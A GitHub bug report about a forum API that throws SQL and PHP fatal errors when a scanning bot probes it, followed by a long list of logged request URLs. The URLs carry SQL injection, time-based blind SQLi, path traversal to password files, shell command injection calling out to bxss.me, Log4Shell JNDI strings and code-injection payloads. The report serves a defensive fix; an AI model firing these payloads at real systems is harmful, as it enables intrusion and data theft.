Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Insufficient request validation - some bots generates fatal errors #3627

Closed
rob006 opened this issue Sep 5, 2022 · 0 comments · Fixed by #3795
Closed

Insufficient request validation - some bots generates fatal errors #3627

rob006 opened this issue Sep 5, 2022 · 0 comments · Fixed by #3795
Assignees
@SychO9
Labels
type/bug
Milestone
1.8

Comments

@rob006
Copy link
Contributor

rob006 commented Sep 5, 2022
edited
Loading

Current Behavior

My forum was "attacked" by bot, which send a bunch of requests searching for SQLi, path traversal and similar vulnerabilities. While it does not seems to achieve anything, it generated a bunch of errors, including SQL errors and PHP fatal errors.

Steps to Reproduce

Try any of these URLs:

https://forum.example.com/api/discussions?page[limit]=-1%20OR%202%2B394-394-1=0%2B0%2B0%2B1&page[offset]=20&sort=
https://forum.example.com/api/discussions?page[limit]=-1%20OR%202%2B372-372-1=0%2B0%2B0%2B1%20--%20&page[offset]=20&sort=
https://forum.example.com/api/discussions?page[limit]=-1%20OR%203%2B372-372-1=0%2B0%2B0%2B1%20--%20&page[offset]=20&sort=
https://forum.example.com/api/discussions?page[limit]=-1'%20OR%202%2B200-200-1=0%2B0%2B0%2B1%20--%20&page[offset]=20&sort=
https://forum.example.com/api/discussions?page[limit]=-1'%20OR%203%2B200-200-1=0%2B0%2B0%2B1%20--%20&page[offset]=20&sort=
https://forum.example.com/api/discussions?page[limit]=-1'%20OR%202%2B238-238-1=0%2B0%2B0%2B1%20or%20'ChG1bdqK'='&page[offset]=20&sort=
https://forum.example.com/api/discussions?page[limit]=-1\"%20OR%202%2B587-587-1=0%2B0%2B0%2B1%20--%20&page[offset]=20&sort=
https://forum.example.com/api/discussions?page[limit]=-1'%20OR%203%2B238-238-1=0%2B0%2B0%2B1%20or%20'ChG1bdqK'='&page[offset]=20&sort=
https://forum.example.com/api/discussions?page[limit]=-1%20OR%203%2B394-394-1=0%2B0%2B0%2B1&page[offset]=20&sort=
https://forum.example.com/api/discussions?page[limit]=-1\"%20OR%203%2B587-587-1=0%2B0%2B0%2B1%20--%20&page[offset]=20&sort=
https://forum.example.com/api/discussions?page[limit]=-1;%20waitfor%20delay%20'0:0:15'%20--%20&page[offset]=20&sort=
https://forum.example.com/api/discussions?page[limit]=-1);%20waitfor%20delay%20'0:0:15'%20--%20&page[offset]=20&sort=
https://forum.example.com/api/discussions?page[limit]=-5%20OR%20964=(SELECT%20964%20FROM%20PG_SLEEP(15))--&page[offset]=20&sort=
https://forum.example.com/api/discussions?page[limit]=-5)%20OR%20232=(SELECT%20232%20FROM%20PG_SLEEP(15))--&page[offset]=20&sort=
https://forum.example.com/api/discussions?filter=1&page[limit]=-1%20OR%202%2B547-547-1=0%2B0%2B0%2B1%20--%20&page[offset]=20&sort=
https://forum.example.com/api/discussions?filter=1&page[limit]=-1%20OR%202%2B247-247-1=0%2B0%2B0%2B1&page[offset]=20&sort=
https://forum.example.com/api/discussions?filter=1&page[limit]=-1%20OR%203%2B247-247-1=0%2B0%2B0%2B1&page[offset]=20&sort=
https://forum.example.com/api/discussions?filter=1&page[limit]=-1%20OR%203%2B547-547-1=0%2B0%2B0%2B1%20--%20&page[offset]=20&sort=
https://forum.example.com/api/discussions?page[limit]=-1))%20OR%20809=(SELECT%20809%20FROM%20PG_SLEEP(15))--&page[offset]=20&sort=
https://forum.example.com/api/discussions?sort&filter[tag][]=feedback&include=user%2ClastPostedUser%2Ctags%2Ctags.parent%2CfirstPost&page[offset]=0
https://forum.example.com/api/discussions?sort&filter[tag][%24acunetix]=1&include=user%2ClastPostedUser%2Ctags%2Ctags.parent%2CfirstPost&page[offset]=0
https://forum.example.com/api/discussions?filter=1&page[limit]=-1\"%20OR%203%2B964-964-1=0%2B0%2B0%2B1%20--%20&page[offset]=20&sort=
https://forum.example.com/api/discussions?filter=1&page[limit]=-1\"%20OR%202%2B964-964-1=0%2B0%2B0%2B1%20--%20&page[offset]=20&sort=
https://forum.example.com/api/discussions?filter=1&page[limit]=-1'%20OR%203%2B510-510-1=0%2B0%2B0%2B1%20or%20'KkHPLwBp'='&page[offset]=20&sort=
https://forum.example.com/api/discussions?filter=1&page[limit]=-1'%20OR%202%2B510-510-1=0%2B0%2B0%2B1%20or%20'KkHPLwBp'='&page[offset]=20&sort=
https://forum.example.com/api/discussions?filter=1&page[limit]=-1;%20waitfor%20delay%20'0:0:15'%20--%20&page[offset]=20&sort=
https://forum.example.com/api/discussions?filter=1&page[limit]=-1);%20waitfor%20delay%20'0:0:15'%20--%20&page[offset]=20&sort=
https://forum.example.com/api/discussions?filter=1&page[limit]=-5%20OR%20859=(SELECT%20859%20FROM%20PG_SLEEP(15))--&page[offset]=20&sort=
https://forum.example.com/api/discussions?filter=1&page[limit]=-5)%20OR%20485=(SELECT%20485%20FROM%20PG_SLEEP(15))--&page[offset]=20&sort=
https://forum.example.com/api/discussions?filter=1&page[limit]=-1))%20OR%20564=(SELECT%20564%20FROM%20PG_SLEEP(15))--&page[offset]=20&sort=
https://forum.example.com/api/posts?filter[discussion]=response.write(9318043*9589458)&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=%0A%0D%BF%F0%9F%92%A1'\"><%26;%7C%24{%24{lower:j}%24{::-n}d%24{upper:%C4%B1}:dns%24{::-:}//hitxgimfaqtyi33eaa%24{::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=../../../../../../../../../../../../../../etc/passwd&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=%26echo%20uzikoo%24()%5C%20fzuvhg%5Cnz%5Exyu%7C%7Ca%20%23'%20%26echo%20uzikoo%24()%5C%20fzuvhg%5Cnz%5Exyu%7C%7Ca%20%23%7C\"%20%26echo%20uzikoo%24()%5C%20fzuvhg%5Cnz%5Exyu%7C%7Ca%20%23&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=%24{j%24{::-n}di:dns%24{::-:}%24{::-/}/hitvyowbrecnr3c305%24{::-.}bxss.me}zzzz&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=../492&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=to@example.com>%0d%0abcc:074625.243-13916.243.9bdbc.19235.2@bxss.me&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=\"%2Bresponse.write(9318043*9589458)%2B\"&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=echo%20xtkbvk%24()%5C%20bwhgxi%5Cnz%5Exyu%7C%7Ca%20%23'%20%26echo%20xtkbvk%24()%5C%20bwhgxi%5Cnz%5Exyu%7C%7Ca%20%23%7C\"%20%26echo%20xtkbvk%24()%5C%20bwhgxi%5Cnz%5Exyu%7C%7Ca%20%23&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=../../../../../../../../../../../../../../windows/win.ini&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=12345'\"\\'\\\");|]*%00{%0d%0a<%00>%bf%27'\xf0\x9f\x92\xa1&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=(nslookup%20hitcmnnhrygpv022b7.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitcmnnhrygpv022b7.bxss.me')\")&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=%26(nslookup%20hitzxezxefnvge6341.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitzxezxefnvge6341.bxss.me')\")%26'%5C\"`0%26(nslookup%20hitzxezxefnvge6341.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitzxezxefnvge6341.bxss.me')\")%26`'&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=./492&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=`(nslookup%20hitnaqctdssrs4c337.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitnaqctdssrs4c337.bxss.me')\")`&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=\".gethostbyname(lc(\"hithy\".\"ophqtjkc104e8.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(103).chr(74).chr(113).chr(69).\"&page[near]=34
https://forum.example.com/api/posts?filter[discussion]='%2Bstr(__import__(\"time\").sleep(9))%2B__import__(\"socket\").gethostbyname(\"hitxdsgbyrpyneb398.\"%2B\"bxss.me\")%2B'&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=)&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=%7Cecho%20uvuzor%24()%5C%20naekbh%5Cnz%5Exyu%7C%7Ca%20%23'%20%7Cecho%20uvuzor%24()%5C%20naekbh%5Cnz%5Exyu%7C%7Ca%20%23%7C\"%20%7Cecho%20uvuzor%24()%5C%20naekbh%5Cnz%5Exyu%7C%7Ca%20%23&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=;(nslookup%20hitputeiuxbas1e940.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitputeiuxbas1e940.bxss.me')\")%7C(nslookup%20hitputeiuxbas1e940.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitputeiuxbas1e940.bxss.me')\")%26(nslookup%20hitputeiuxbas1e940.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitputeiuxbas1e940.bxss.me')\")&page[near]=34
https://forum.example.com/api/posts?filter[discussion]='.gethostbyname(lc('hitlu'.'pegtqvgg23725.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(68).chr(121).chr(72).'&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=\"%2Bstr(__import__('time').sleep(9))%2B__import__('socket').gethostbyname('hitxdsgbyrpyneb398.'%2B'bxss.me')%2B\"&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=!(()%26%26!%7C*%7C*%7C&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=%5E(%23%24!%40%23%24)(()))******&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=bxss.me/t/xss.html%3F%2500&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=posts&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=http://hitxsqvyzfioz.bxss.me/&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=&page[near]=34
https://forum.example.com/api/posts?filter[discussion][]=492&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=%7C(nslookup%20hithxgysbjequ31013.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hithxgysbjequ31013.bxss.me')\")&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=posts%00&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=str(__import__('time').sleep(9))%2B__import__('socket').gethostbyname('hitxdsgbyrpyneb398.'%2B'bxss.me')&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=\"%2B\"A\".concat(70-3).concat(22*4).concat(108).concat(82).concat(114).concat(84)%2B(require\"socket\"%0ASocket.gethostbyname(\"hitqs\"%2B\"tbebpety9b991.bxss.me.\")[3].to_s)%2B\"&page[near]=34
https://forum.example.com/api/posts?filter[discussion]='.print(md5(31337)).'&page[near]=34
https://forum.example.com/api/posts?filter[discussion]='%2Bresponse.write(9318043*9589458)%2B'&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=%24{%24{:::::::::::::::::-j}ndi:dns%24{:::::::::::::::::-:}%24{::-/}/dns.log4j.074625.243-13904.243.9bdbc%24{::-.}1%24{::-.}bxss.me}}&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=%24(nslookup%20hitlsxbikxzovbc02e.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitlsxbikxzovbc02e.bxss.me')\")&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=%24{10000045%2B10000103}&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=c:/windows/win.ini&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=Http://bxss.me/t/fit.txt&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=http://bxss.me/t/fit.txt%3F.jpg&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=/etc/shells&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=%24{%40print(md5(31337))}%5C&page[near]=34
https://forum.example.com/api/posts?filter[discussion][%24acunetix]=1&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=HttP://bxss.me/t/xss.html%3F%2500&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=';print(md5(31337));%24a='&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=%24{%40print(md5(31337))}&page[near]=34
https://forum.example.com/api/posts?filter[discussion]='\"&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=\";print(md5(31337));%24a=\"&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=bxss.me&page[near]=34
https://forum.example.com/api/posts?filter[discussion]='\"()&page[near]=34
https://forum.example.com/api/posts?filter[discussion]='%2B'A'.concat(70-3).concat(22*4).concat(101).concat(85).concat(116).concat(74)%2B(require'socket'%0ASocket.gethostbyname('hitde'%2B'xkudaqze82cdf.bxss.me.')[3].to_s)%2B'&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=E85L79PU&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=-1%20OR%202%2B963-963-1=0%2B0%2B0%2B1&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=-1%20OR%203%2B963-963-1=0%2B0%2B0%2B1&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=%40%40BT9kR&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=posts/.&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=<!--&page[near]=34
https://forum.example.com/api/posts?filter[discussion]=\"%2Bresponse.write(9856194*9684468)%2B\"&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=echo%20wfjmmt%24()%5C%20mhcfdz%5Cnz%5Exyu%7C%7Ca%20%23'%20%26echo%20wfjmmt%24()%5C%20mhcfdz%5Cnz%5Exyu%7C%7Ca%20%23%7C\"%20%26echo%20wfjmmt%24()%5C%20mhcfdz%5Cnz%5Exyu%7C%7Ca%20%23&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=%24{j%24{::-n}di:dns%24{::-:}%24{::-/}/hitdbtmnnznuwaccd8%24{::-.}bxss.me}zzzz&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=response.write(9856194*9684468)&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=../../../../../../../../../../../../../../etc/passwd&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=./492&page[near]=22
https://forum.example.com/api/posts?filter[discussion][]=492&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=%26(nslookup%20hitqivdfirkjv603df.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitqivdfirkjv603df.bxss.me')\")%26'%5C\"`0%26(nslookup%20hitqivdfirkjv603df.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitqivdfirkjv603df.bxss.me')\")%26`'&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=%0A%0D%BF%F0%9F%92%A1'\"><%26;%7C%24{%24{lower:j}%24{::-n}d%24{upper:%C4%B1}:dns%24{::-:}//hitdfvxtbncup62be2%24{::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=../492&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=!(()%26%26!%7C*%7C*%7C&page[near]=22
https://forum.example.com/api/posts?filter[discussion]='\"()&page[near]=22
https://forum.example.com/api/posts?filter[discussion]='%2Bresponse.write(9856194*9684468)%2B'&page[near]=22
https://forum.example.com/api/posts?filter[discussion][%24acunetix]=1&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=';print(md5(31337));%24a='&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=(nslookup%20hitocvcqpitjj45d90.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitocvcqpitjj45d90.bxss.me')\")&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=12345'\"\\'\\\");|]*%00{%0d%0a<%00>%bf%27'\xf0\x9f\x92\xa1&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=%24(nslookup%20hitfpkqostifxaa306.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitfpkqostifxaa306.bxss.me')\")&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=%24{9999221%2B9999132}&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=)&page[near]=22
https://forum.example.com/api/posts?filter[discussion]='.gethostbyname(lc('hiteq'.'fibzrbiu38310.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(80).chr(103).chr(69).'&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=bxss.me/t/xss.html%3F%2500&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=\"%2Bstr(__import__('time').sleep(9))%2B__import__('socket').gethostbyname('hitpouyxpokvj0dd36.'%2B'bxss.me')%2B\"&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=Http://bxss.me/t/fit.txt&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=../../../../../../../../../../../../../../windows/win.ini&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=to@example.com>%0d%0abcc:074625.243-21813.243.9bdbc.19235.2@bxss.me&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=%24{%24{:::::::::::::::::-j}ndi:dns%24{:::::::::::::::::-:}%24{::-/}/dns.log4j.074625.243-21814.243.9bdbc%24{::-.}1%24{::-.}bxss.me}}&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=\".gethostbyname(lc(\"hitcu\".\"jyfwoqkp6febf.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(104).chr(66).chr(101).chr(88).\"&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=%7C(nslookup%20hitzhazidaozcff9be.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitzhazidaozcff9be.bxss.me')\")&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=\"%2B\"A\".concat(70-3).concat(22*4).concat(102).concat(69).concat(104).concat(68)%2B(require\"socket\"%0ASocket.gethostbyname(\"hitzb\"%2B\"hwngbayla217d.bxss.me.\")[3].to_s)%2B\"&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=posts&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=http://hitkhsnzaksay.bxss.me/&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=HttP://bxss.me/t/xss.html%3F%2500&page[near]=22
https://forum.example.com/api/posts?filter[discussion]='%2Bstr(__import__(\"time\").sleep(9))%2B__import__(\"socket\").gethostbyname(\"hitpouyxpokvj0dd36.\"%2B\"bxss.me\")%2B'&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))&page[near]=22
https://forum.example.com/api/posts?filter[discussion]='\"&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=<!--&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=;(nslookup%20hitxogvtlvnxqf4994.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitxogvtlvnxqf4994.bxss.me')\")%7C(nslookup%20hitxogvtlvnxqf4994.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitxogvtlvnxqf4994.bxss.me')\")%26(nslookup%20hitxogvtlvnxqf4994.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitxogvtlvnxqf4994.bxss.me')\")&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=%26echo%20sbukuy%24()%5C%20lsknmk%5Cnz%5Exyu%7C%7Ca%20%23'%20%26echo%20sbukuy%24()%5C%20lsknmk%5Cnz%5Exyu%7C%7Ca%20%23%7C\"%20%26echo%20sbukuy%24()%5C%20lsknmk%5Cnz%5Exyu%7C%7Ca%20%23&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=%5E(%23%24!%40%23%24)(()))******&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=posts/.&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=http://bxss.me/t/fit.txt%3F.jpg&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=c:/windows/win.ini&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=`(nslookup%20hitdvwzqghmiid771a.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitdvwzqghmiid771a.bxss.me')\")`&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=posts%00&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=/etc/shells&page[near]=22
https://forum.example.com/api/posts?filter[discussion]='%2B'A'.concat(70-3).concat(22*4).concat(115).concat(81).concat(110).concat(81)%2B(require'socket'%0ASocket.gethostbyname('hitul'%2B'himlakxt8636f.bxss.me.')[3].to_s)%2B'&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=str(__import__('time').sleep(9))%2B__import__('socket').gethostbyname('hitpouyxpokvj0dd36.'%2B'bxss.me')&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=bxss.me&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=\";print(md5(31337));%24a=\"&page[near]=22
https://forum.example.com/api/posts?filter[discussion]='.print(md5(31337)).'&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=%24{%40print(md5(31337))}&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=%24{%40print(md5(31337))}%5C&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=%7Cecho%20eqdhuz%24()%5C%20kztibh%5Cnz%5Exyu%7C%7Ca%20%23'%20%7Cecho%20eqdhuz%24()%5C%20kztibh%5Cnz%5Exyu%7C%7Ca%20%23%7C\"%20%7Cecho%20eqdhuz%24()%5C%20kztibh%5Cnz%5Exyu%7C%7Ca%20%23&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=DJ1f4Agu&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=-1%20OR%202%2B917-917-1=0%2B0%2B0%2B1&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=echo%20ftzmuc%24()%5C%20sbqhos%5Cnz%5Exyu%7C%7Ca%20%23'%20%26echo%20ftzmuc%24()%5C%20sbqhos%5Cnz%5Exyu%7C%7Ca%20%23%7C\"%20%26echo%20ftzmuc%24()%5C%20sbqhos%5Cnz%5Exyu%7C%7Ca%20%23&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=%24(nslookup%20hitrbejrblzpd15ae9.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitrbejrblzpd15ae9.bxss.me')\")&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=response.write(9343731*9902032)&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=../../../../../../../../../../../../../../windows/win.ini&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=%0A%0D%BF%F0%9F%92%A1'\"><%26;%7C%24{%24{lower:j}%24{::-n}d%24{upper:%C4%B1}:dns%24{::-:}//hitljygforuhp6e7fa%24{::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=%24{%24{:::::::::::::::::-j}ndi:dns%24{:::::::::::::::::-:}%24{::-/}/dns.log4j.074625.243-21887.243.9bdbc%24{::-.}1%24{::-.}bxss.me}}&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=../492&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=-1%20OR%203%2B917-917-1=0%2B0%2B0%2B1&page[near]=22
https://forum.example.com/api/posts?filter[discussion]=%24{j%24{::-n}di:dns%24{::-:}%24{::-/}/hitvozsrwvaugef64e%24{::-.}bxss.me}zzzz&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=(nslookup%20hitrxmfkmfchmf4ea8.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitrxmfkmfchmf4ea8.bxss.me')\")&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg&page[near]=47
https://forum.example.com/api/posts?filter[discussion]='%2Bresponse.write(9343731*9902032)%2B'&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=\"%2Bresponse.write(9343731*9902032)%2B\"&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=%26echo%20crwldm%24()%5C%20jurttl%5Cnz%5Exyu%7C%7Ca%20%23'%20%26echo%20crwldm%24()%5C%20jurttl%5Cnz%5Exyu%7C%7Ca%20%23%7C\"%20%26echo%20crwldm%24()%5C%20jurttl%5Cnz%5Exyu%7C%7Ca%20%23&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=%7Cecho%20cucpkz%24()%5C%20umfxxo%5Cnz%5Exyu%7C%7Ca%20%23'%20%7Cecho%20cucpkz%24()%5C%20umfxxo%5Cnz%5Exyu%7C%7Ca%20%23%7C\"%20%7Cecho%20cucpkz%24()%5C%20umfxxo%5Cnz%5Exyu%7C%7Ca%20%23&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=%26(nslookup%20hitvbynfyxshd70315.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitvbynfyxshd70315.bxss.me')\")%26'%5C\"`0%26(nslookup%20hitvbynfyxshd70315.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitvbynfyxshd70315.bxss.me')\")%26`'&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=12345'\"\\'\\\");|]*%00{%0d%0a<%00>%bf%27'\xf0\x9f\x92\xa1&page[near]=47
https://forum.example.com/api/posts?filter[discussion][]=492&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=%24{9999629%2B10000062}&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=!(()%26%26!%7C*%7C*%7C&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=%5E(%23%24!%40%23%24)(()))******&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=bxss.me&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=/etc/shells&page[near]=47
https://forum.example.com/api/posts?filter[discussion]='.gethostbyname(lc('hitgu'.'lmgffdhxf0419.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(89).chr(122).chr(87).'&page[near]=47
https://forum.example.com/api/posts?filter[discussion]='.print(md5(31337)).'&page[near]=47
https://forum.example.com/api/posts?filter[discussion]='%2Bstr(__import__(\"time\").sleep(9))%2B__import__(\"socket\").gethostbyname(\"hitrodbdrzpqd2f531.\"%2B\"bxss.me\")%2B'&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=\".gethostbyname(lc(\"hittg\".\"enyepunqa8038.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(115).chr(77).chr(102).chr(73).\"&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=../../../../../../../../../../../../../../etc/passwd&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=%7C(nslookup%20hitppskddyesaa3c49.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitppskddyesaa3c49.bxss.me')\")&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=\";print(md5(31337));%24a=\"&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=%24{%40print(md5(31337))}%5C&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=HttP://bxss.me/t/xss.html%3F%2500&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=to@example.com>%0d%0abcc:074625.243-21892.243.9bdbc.19235.2@bxss.me&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=Http://bxss.me/t/fit.txt&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=\"%2B\"A\".concat(70-3).concat(22*4).concat(109).concat(90).concat(105).concat(73)%2B(require\"socket\"%0ASocket.gethostbyname(\"hitzx\"%2B\"zkfdnakzc19db.bxss.me.\")[3].to_s)%2B\"&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=<!--&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=http://hitwszvwagcoj.bxss.me/&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))&page[near]=47
https://forum.example.com/api/posts?filter[discussion]=`(nslookup%20hitgydlfnjveb311b5.bxss.me%7C%7Cperl%20-e%20\"gethostbyname('hitgydlfnjveb311b5.bxss.me')\")`&page[near]=47
